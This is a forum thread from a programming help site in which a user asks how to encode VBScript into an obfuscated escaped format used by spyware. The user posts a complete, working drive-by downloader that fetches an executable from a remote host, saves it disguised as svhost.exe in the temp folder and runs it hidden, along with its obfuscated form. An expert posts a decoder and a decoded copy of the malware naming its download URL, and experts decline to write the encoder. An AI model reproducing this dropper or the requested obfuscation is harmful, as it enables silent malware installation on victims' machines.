Solved

Javascript Unicode escaped characters (vbscript encode)

Posted on 2006-10-28
28
1,617 Views
Last Modified: 2007-12-19
Im not java guru or anywhere near that so im having a little problem.

I've a script which decodes escaped characters
Script:
<script language="javascript">
function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
</script>

And thing to be decoded is written as
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(.....(6F2vfulsw(6H3

This thing is actually a VBscript encoded in that manner.
can anyone guide me how can i convert other vbscripts in above format? i.e: (6Fvfulsw(53odqjxdjh

i tried encoding by escape but i was not able to achieve my objective to convert it in (6Fvfulsw(53odqjxdjh manner.

http://scriptasylum.com/tutorials/encdec/encode-decode.html on this page 2nd decoder will help you decode.
0
Comment
Question by:Unknown-Killer
  • 11
  • 8
  • 4
  • +1
28 Comments
 

Author Comment

by:Unknown-Killer
ID: 17825734
i would love if someone will post script in java or php to convert normal vbscript into that format and encoded stuff must be able to get decoded by this script

function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
df(mycode);
</script>
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17826199
0
 

Author Comment

by:Unknown-Killer
ID: 17828033
can u be a little more brief and point me directly to the encoder?
0
 

Author Comment

by:Unknown-Killer
ID: 17828039
My Script:
<script language="VBScript">
    on error resume next
    dl = "http://-----/yo.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="svhost.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </script>
After editing some stuff i want it to get converted in format like this
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(53huuru(53uhvxph(53qh{w(3G(3D(53(53(53(53go(53(6G(53(55kwws(6D22lwdoldqgluhfwru|1frp2whuph{2}lq1h{h(55(3G(3D(53(53(53(53Vhw(53gi(53(6G(53grfxphqw1fuhdwhHohphqw(5;(55remhfw(55(5<(3G(3D(53(53(53(53gi1vhwDwwulexwh(53(55fodvvlg(55(5F(53(55fovlg(6DEG<9F889098D6044G30<;6D033F37IF5<H69(55(3G(3D(53(53(53(53vwu(6G(55Plfurvriw1[POKWWS(55(3G(3D(53(53(53(53Vhw(53{(53(6G(53gi1FuhdwhRemhfw(5;vwu(5F(55(55(5<(3G(3D(53(53(53(53d4(6G(55Dgr(55(3G(3D(53(53(53(53d5(6G(55ge1(55(3G(3D(53(53(53(53d6(6G(55Vwu(55(3G(3D(53(53(53(53d7(6G(55hdp(55(3G(3D(53(53(53(53vwu4(6Gd4(59d5(59d6(59d7(3G(3D(53(53(53(53vwu8(6Gvwu4(3G(3D(53(53(53(53vhw(53V(53(6G(53gi1fuhdwhremhfw(5;vwu8(5F(55(55(5<(3G(3D(53(53(53(53V1w|sh(53(6G(534(3G(3D(53(53(53(53vwu9(6G(55JHW(55(3G(3D(53(53(53(53{1Rshq(53vwu9(5F(53go(5F(53Idovh(3G(3D(53(53(53(53{1Vhqg(3G(3D(53(53(53(53iqdph4(6G(55vykrvw1h{h(55(3G(3D(53(53(53(53vhw(53I(53(6G(53gi1fuhdwhremhfw(5;(55Vfulswlqj1IlohV|vwhpRemhfw(55(5F(55(55(5<(3G(3D(53(53(53(53vhw(53wps(53(6G(53I1JhwVshfldoIroghu(5;5(5<(3G(3D(53(53(53(53iqdph4(6G(53I1ExlogSdwk(5;wps(5Fiqdph4(5<(3G(3D(53(53(53(53V1rshq(3G(3D(53(53(53(53V1zulwh(53{1uhvsrqvhErg|(3G(3D(53(53(53(53V1vdyhwriloh(53iqdph4(5F5(3G(3D(53(53(53(53V1forvh(3G(3D(53(53(53(53vhw(53T(53(6G(53gi1fuhdwhremhfw(5;(55Vkhoo1Dssolfdwlrq(55(5F(55(55(5<(3G(3D(53(53(53(53T1VkhooH{hfxwh(53iqdph4(5F(55(55(5F(55(55(5F(55rshq(55(5F3(3G(3D(53(53(53(53(6F2vfulsw(6H3

I copied above code from some where else and it is not my encoded code
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 17831062
 Unfortunately, this question refers to Javascript, when, in fact, it is a VBscript question.  I wonder if a moderator could change this wording?
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17832438
The decoder is JS
0
 

Author Comment

by:Unknown-Killer
ID: 17834095
so any one?
0
 

Author Comment

by:Unknown-Killer
ID: 17841817
any pro dont know about it?
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17841911
0
 

Author Comment

by:Unknown-Killer
ID: 17843034
thats a decoder dude

maybe this can help
http://www.ibresource.ru/forums/index.php?showtopic=28683&pid=180784&mode=threaded&show=&st=&

if you dont understand russian then use http://babelfish.altavista.com
they have some other script but encoded like i say
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17843097
0
 

Author Comment

by:Unknown-Killer
ID: 17843124
i was searching in google and came across this url
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.99show.com/adduser.asp&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3D(6Fvfulsw%26hl%3Den%26lr%3D%26sa%3DG

after looking at source i found out a code

(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3

i decoded it and got
<script language=JScript.Encode src=http://www.jq4u.com/myadv.asp></script>
but that page shows nothing maybe it needs paremeters
can it help?
0
Maximize Your Threat Intelligence Reporting

Reporting is one of the most important and least talked about aspects of a world-class threat intelligence program. Here’s how to do it right.

 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17847993
No, it is just a japanese page that no longer returns a script
0
 

Author Comment

by:Unknown-Killer
ID: 17848076
hah still no good method :-s i think this thing is buggy but some italian guys also coded stuff like that & have their spyware stuff being spread
0
 
LVL 75

Accepted Solution

by:
Michel Plungjan earned 250 total points
ID: 17848269
So you need to encode your vbscript to spread spyware too? I hope not!

Did you try
http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en
0
 

Author Comment

by:Unknown-Killer
ID: 17849205
no, i want to expose exploit so microsoft can make their information bar more secure,
if u want mplungjan i can send u link to but anywhr in private to that spyware company
i work in a office and that spyware is spreading by yahoo infected lots of comps

i went to that link and it asks for genuine os stuff i dont know what it is talking about
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17849249
So why do you need an ENCODER to expose ?

Michel
0
 

Author Comment

by:Unknown-Killer
ID: 17857185
actually its a project, i'll get some good remarks on giving this thing to my company
0
 
LVL 10

Assisted Solution

by:dennis_maeder
dennis_maeder earned 250 total points
ID: 17867959
This scheme treats the two chars after ( as an offset pseudo-hexcode and other characters are offset ascii codes.
Here is a javascript to do the decoding for the example you provided.
It is possible that the offsets may vary - change eoff and roff.
It is also advisable to use the alert to view code ( or add spaces between characters ) in case the decrypted code is malicious.
D


<script type="text/javascript">

var cr = "(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3";
alert (decode(cr));

function decode(cryptic){
  var dc   = "";
  var eoff = 51;
  var roff = 3;
  var ec   = "(";
  var cod  = "0123456789ABCDEFGHIJKLMN";
  var d    = "";
  var i    = 0;
  while(i < cryptic.length -1 ) {
    var c = cryptic.charAt(i);
    if (c == ec){
      /* deal with pseudo-hex code*/
      d = String.fromCharCode( 16*cod.indexOf(cryptic.charAt(i+1))+cod.indexOf(cryptic.charAt(i+2)) - eoff);
        i=i+3;      
      }
    else {
        d = String.fromCharCode(cryptic.charCodeAt(i)-roff);
        i++;      
      }
      dc=dc+d;
  }  
  return dc;      
}

</script>
 
0
 
LVL 10

Expert Comment

by:dennis_maeder
ID: 17868048
The other code you quoted is most certainly malicious (to windows) and points to various exe
e.g.
<|s|c|r|i|p|t| |l|a|n|g|u|a|g|e|=|"|V|B|S|c|r|i|p|t|"|>| | | | | | |o|n| |e|r|r|o|r| |r|e|s|u|m|e| |n|e|x|t| | | | | | |d|l| |=| |"|h|t|t|p|:|/|/|i|t|a|l|i|a|n|d|i|r|e|c|t|o|r|y|.|c|o|m|/|t|e|r|m|e|x|/|z|i|n|.|e|x|e|"| | | | | | |S|e|t| |d|f| |=| |d|o|c|u|m|e|n|t|.|c|r|e|a|t|e|E|l|e|m|e|n|t||"|o|b|j|e|c|t|"|| | | | | | |d|f|.|s|e|t|A|t|t|r|i|b|u|t|e| |"|c|l|a|s|s|i|d|"|,| |"|c|l|s|i|d|:|B|D|9|6|C|5|5|6|-|6|5|A|3|-|1|1|D|0|-|9|8|3|A|-|0|0|C|0|4|F|C|2|9|E|3|6|"| | | | | | |s|t|r|=|"|M|i|c|r|o|s|o|f|t|.|X|M|L|H|T|T|P|"| | | | | | |S|e|t| |x| |=| |d|f|.|C|r|e|a|t|e|O|b|j|e|c|t||s|t|r|,|"|"|| | | | | | |a|1|=|"|A|d|o|"| | | | | | |a|2|=|"|d|b|.|"| | | | | | |a|3|=|"|S|t|r|"| | | | | | |a|4|=|"|e|a|m|"| | | | | | |s|t|r|1|=|a|1|&|a|2|&|a|3|&|a|4| | | | | | |s|t|r|5|=|s|t|r|1| | | | | | |s|e|t| |S| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||s|t|r|5|,|"|"|| | | | | | |S|.|t|y|p|e| |=| |1| | | | | | |s|t|r|6|=|"|G|E|T|"| | | | | | |x|.|O|p|e|n| |s|t|r|6|,| |d|l|,| |F|a|l|s|e| | | | | | |x|.|S|e|n|d| | | | | | |f|n|a|m|e|1|=|"|s|v|h|o|s|t|.|e|x|e|"| | | | | | |s|e|t| |F| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|c|r|i|p|t|i|n|g|.|F|i|l|e|S|y|s|t|e|m|O|b|j|e|c|t|"|,|"|"|| | | | | | |s|e|t| |t|m|p| |=| |F|.|G|e|t|S|p|e|c|i|a|l|F|o|l|d|e|r||2|| | | | | | |f|n|a|m|e|1|=| |F|.|B|u|i|l|d|P|a|t|h||t|m|p|,|f|n|a|m|e|1|| | | | | | |S|.|o|p|e|n| | | | | | |S|.|w|r|i|t|e| |x|.|r|e|s|p|o|n|s|e|B|o|d|y| | | | | | |S|.|s|a|v|e|t|o|f|i|l|e| |f|n|a|m|e|1|,|2| | | | | | |S|.|c|l|o|s|e| | | | | | |s|e|t| |Q| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|h|e|l|l|.|A|p|p|l|i|c|a|t|i|o|n|"|,|"|"|| | | | | | |Q|.|S|h|e|l|l|E|x|e|c|u|t|e| |f|n|a|m|e|1|,|"|"|,|"|"|,|"|o|p|e|n|"|,|0| | | | | | |<|/|s|c|r|i|p|t|>|
0
 

Author Comment

by:Unknown-Killer
ID: 17924889
dennis_maeder can u tell me how to make encoder? i aint a java guru
0
 
LVL 10

Expert Comment

by:dennis_maeder
ID: 17929285
Unknown-Killer, mplungjan,
Yes I think I can write a javascript encoder of this sort, but I'm not sure that I should.
Let me explain:
A decoder is defensive, it helps you know whats going on with a threat, but a published encoder may be used by some for illicit purposes.
This request is for a specific type of encoding known to be used for antisocial purposes, and I must assume that any code I might produce could be used in that way.
However, the scriptasylum link you gave at the top offers an encoder, and you or anyone could obfuscate their code using that.
Michel, as page editor, what do you think?
D
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17929454
I completely agree - hence my question in
#17849249
0
 
LVL 10

Expert Comment

by:dennis_maeder
ID: 18151786
See my comments of 11/13. It took some effort to show questioner how the code worked, but I stopped short of providing an encoder for ethical reasons and to follow EE guidelines in concert with page editor and contributor Michel Plungjan. Should that be penalized?
D
0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

Preface This is the third article about the EE Collaborative Login Project. A Better Website Login System (http://www.experts-exchange.com/A_2902.html) introduces the Login System and shows how to implement a login page. The EE Collaborative Logi…
JavaScript has plenty of pieces of code people often just copy/paste from somewhere but never quite fully understand. Self-Executing functions are just one good example that I'll try to demystify here.
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…
HTML5 has deprecated a few of the older ways of showing media as well as offering up a new way to create games and animations. Audio, video, and canvas are just a few of the adjustments made between XHTML and HTML5. As we learned in our last micr…

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

13 Experts available now in Live!

Get 1:1 Help Now